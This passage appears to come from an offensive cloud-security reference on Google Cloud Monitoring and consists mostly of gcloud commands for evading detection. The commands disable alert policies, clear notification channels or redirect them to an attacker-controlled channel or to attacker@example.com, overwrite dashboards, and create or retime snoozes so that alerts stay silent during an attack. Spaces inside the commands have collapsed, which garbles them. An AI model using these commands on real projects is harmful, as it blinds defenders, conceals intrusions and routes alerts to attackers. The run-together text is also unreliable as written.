# Disable policygcloudalphamonitoringpoliciesupdate<alert-policy>--no-enabled# Remove all notification channelsgcloudalphamonitoringpoliciesupdate<alert-policy>--clear-notification-channels# Chnage notification channelsgcloudalphamonitoringpoliciesupdate<alert-policy>--set-notification-channels=ATTACKER_CONTROLLED_CHANNEL# Modify alert conditionsgcloudalphamonitoringpoliciesupdate<alert-policy>--policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"# or use --policy-from-file <policy-file>
monitoring.dashboards.update
Modify a dashboard to disrupt it:
# Disrupt dashboardgcloudmonitoringdashboardsupdate<dashboard>--config=''' displayName: New Dashboard with New Display Name etag: 40d1040034db4e5a9dee931ec1b12c0d gridLayout: widgets: - text: content: Hello World '''
Prevent policies from generating alerts by creating a snoozer:
# Stop alerts by creating a snoozergcloudmonitoringsnoozescreate--display-name="Maintenance Week" \--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \--start-time="2023-03-01T03:00:00.0-0500" \--end-time="2023-03-07T23:59:59.5-0500"
monitoring.snoozes.update
Update the timing of a snoozer to prevent alerts from being created when the attacker is interested:
# Modify the timing of a snoozegcloudmonitoringsnoozesupdate<snooze>--start-time=START_TIME--end-time=END_TIME# odify everything, including affected policiesgcloudmonitoringsnoozesupdate<snooze>--snooze-from-file=<file>
# Delete or update labels, for example email channels have the email indicated heregcloudalphamonitoringchannelsupdateCHANNEL_ID--clear-channel-labelsgcloudalphamonitoringchannelsupdateCHANNEL_ID--update-channel-labels=email_address=attacker@example.com